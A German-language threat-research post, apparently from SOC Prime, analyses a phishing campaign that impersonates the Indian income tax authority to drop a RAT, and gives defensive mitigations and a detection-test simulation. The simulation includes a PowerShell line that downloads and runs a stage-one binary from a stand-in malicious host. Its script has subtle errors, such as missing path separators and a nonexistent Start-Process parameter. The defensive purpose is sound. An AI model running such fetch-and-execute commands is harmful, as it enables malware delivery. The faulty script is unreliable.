SOC Prime Bias: Mittel

30 Dec 2025 13:29 UTC

Phishing-Kampagne fälscht indische Einkommensteuer zur Zielausrichtung auf Unternehmen

Author Photo
Ruslan Mikhalov Chief of Threat Research at SOC Prime linkedin icon Folgen
Phishing-Kampagne fälscht indische Einkommensteuer zur Zielausrichtung auf Unternehmen
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Zusammenfassung

Eine Phishing-Operation, die das indische Finanzamt imitiert, liefert ein präpariertes PDF, das Empfänger zu einem gefälschten Compliance-Portal führt. Die Seite fordert die Opfer auf, ein ZIP-Paket herunterzuladen, das einen signierten NSIS-Installer enthält, welcher dann eine mehrstufige Remote Access Trojan (RAT) ausführt. Der RAT bleibt bestehen, indem er einen Windows-Dienst erstellt und mit mehreren C2-Servern über nicht-standardisierte Ports kommuniziert.

Untersuchung

Forscher analysierten den PDF-Köder, die eingebettete URL und den verketteten NSIS-Installer-Workflow. Sie dokumentierten die auf die Festplatte übertragenen Binärdateien, die Erstellung eines versteckten Installationsordners und die Registrierung von NSecRTS.exe als Windows-Dienst. Der Bericht erfasste auch ausgehende Kommunikation zu drei IP-Adressen und hob die Verwendung signierter Payloads während der gesamten Lieferkette hervor.

Abhilfe

Blockieren Sie die bösartige Domain und die zugehörigen IP-Adressen am Perimeter und durch Proxy-Kontrollen. Stärken Sie den E-Mail-Schutz, um steuerbezogene Anhänge und Links zu Compliance-Portalen im Lookalike-Design zu kennzeichnen. Verhindern Sie die automatische Ausführung nicht vertrauenswürdiger Installer, wo möglich, und überwachen Sie die Erstellung verdächtiger Dienste – insbesondere alles, das den Namen „Windows Real-time Protection Service“

trägt.

Alarmieren Sie bei den aufgeführten Dateinamen, Hashes und Aktivitäten zur Windows-Dienstregistrierung, die mit der Infektionskette verbunden sind. Isolieren Sie betroffene Endpunkte, erfassen Sie Arbeitsspeicher- und Festplattenabbilder und führen Sie eine vollständige forensische Untersuchung durch, um weitere RAT-Stufen oder Tools zu identifizieren. Entfernen Sie Persistenzartefakte und setzen Sie potenziell exponierte Anmeldeinformationen zurück, um erneuten Zugriff zu verhindern.

Angriffsfluss

Simulation der Ausführung

Voraussetzung: Der Telemetrie- und Basislinien-Vorflug-Check muss bestanden sein.

Begründung: Dieser Abschnitt beschreibt die genaue Ausführung der gegnerischen Technik (TTP), die die Erkennungsregel auslösen soll. Die Befehle und Erzählungen MÜSSEN die identifizierten TTPs direkt widerspiegeln und darauf abzielen, die genaue Telemetrie zu erzeugen, die von der Erkennungslogik erwartet wird.

  • Angriffserzählung & Befehle:
    Ein Angreifer liefert eine Phishing-E-Mail mit dem Titel „Einkommenssteuerbescheid“. Der Anhang ist ein bösartiges Word-Dokument, das ablegt setup_Ir5swQ3EpeuBpePEpew=.exe to %TEMP%. Das Opfer führt die Datei aus, die wiederum Sibuia.exe (die tatsächliche Nutzlast) als Kindprozess erzeugt. Diese Eltern-Kind-Kette soll generische Prozess-Erstellungswarnungen umgehen, wird aber von der Sigma-Regel erfasst.

    Schritte, die auf dem kompromittierten Host durchgeführt wurden:

    1. Das erste Stufenbinärformat ablegen:
      $stage1 = "$env:TEMPsetup_Ir5swQ3EpeuBpePEpew=.exe"
      Invoke-WebRequest -Uri "http://malicious.example.com/stage1" -OutFile $stage1
    2. Das erste Stufenbinärformat ausführen:
      Start-Process -FilePath $stage1 -NoNewWindow
    3. Das erste Stufenbinärformat erstellt intern das zweite Stufenbinärformat Sibuia.exe im selben Verzeichnis und startet es: (Simuliert durch das unten stehende Testskript.)
  • Regressionstest-Skript:
    Das Skript unten reproduziert die exakte Eltern-Kind-Beziehung, die zur Auslösung der Regel erforderlich ist.

    # -------------------------------------------------
    # Simulation der indischen Einkommenssteuer-Phishing-Kette
    # -------------------------------------------------
    # Pfade definieren
    $stage1 = "$env:TEMPsetup_Ir5swQ3EpeuBpePEpew=.exe"
    $stage2 = "$env:TEMPSibuia.exe"
    
    # Dummy-Binärdateien erstellen (Null-Byte - ausreichend für Sysmon-Protokollierung)
    Set-Content -Path $stage1 -Value 'REM stage1 placeholder' -Encoding ASCII
    Set-Content -Path $stage2 -Value 'REM stage2 placeholder' -Encoding ASCII
    
    # Sicherstellen, dass Dateien ausführbar sind (Windows benötigt kein chmod)
    Write-Host "[*] Stufe1 wird gestartet..."
    $proc1 = Start-Process -FilePath $stage1 -PassThru
    
    # Stufe1 einen Moment zum „Erzeugen“ von Stufe2 (simuliert durch direkten Start) geben
    Start-Sleep -Milliseconds 500
    
    Write-Host "[*] Stufe1 erzeugt Stufe2 (Sibuia.exe)..."
    $proc2 = Start-Process -FilePath $stage2 -PassThru -Parent $proc1.Id
    
    Write-Host "[+] Simulation abgeschlossen. Überprüfen Sie die Erkennung im SIEM."
    # -------------------------------------------------
  • Bereinigungsbefehle:
    Entfernen Sie die Artefakte und beenden Sie alle verbleibenden Prozesse.

    # Alle verbleibenden Prozesse stoppen
    Get-Process -Name "setup_Ir5swQ3EpeuBpePEpew=" -ErrorAction SilentlyContinue | Stop-Process -Force
    Get-Process -Name "Sibuia" -ErrorAction SilentlyContinue | Stop-Process -Force
    
    # Dateien löschen
    Remove-Item -Path "$env:TEMPsetup_Ir5swQ3EpeuBpePEpew=.exe" -Force -ErrorAction SilentlyContinue
    Remove-Item -Path "$env:TEMPSibuia.exe" -Force -ErrorAction SilentlyContinue
    
    Write-Host "[*] Bereinigung abgeschlossen."